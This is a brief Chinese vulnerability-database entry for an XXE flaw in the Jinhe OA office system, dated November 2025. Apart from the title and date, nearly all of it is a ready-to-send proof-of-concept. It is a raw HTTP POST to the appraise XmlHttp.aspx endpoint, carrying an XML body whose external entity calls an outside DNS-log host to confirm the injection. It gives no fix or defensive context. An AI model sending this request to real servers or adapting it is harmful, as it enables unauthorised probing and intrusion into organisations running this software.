金和OA appraise-XmlHttp XXE漏洞

日期: 2025-11-06 | 影响软件: 金和OA | POC: 已公开

漏洞描述

金和OA appraise-XmlHttp XXE漏洞

PoC代码

POST /c6/Jhsoft.Web.appraise/XmlHttp.aspx/ HTTP/1.1
Host: 
Content-Type: application/xml

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [
<!ENTITY % remote SYSTEM "http://xxe.dnslog.pt/xxe_test">
%remote;]>
<root/>

相关漏洞推荐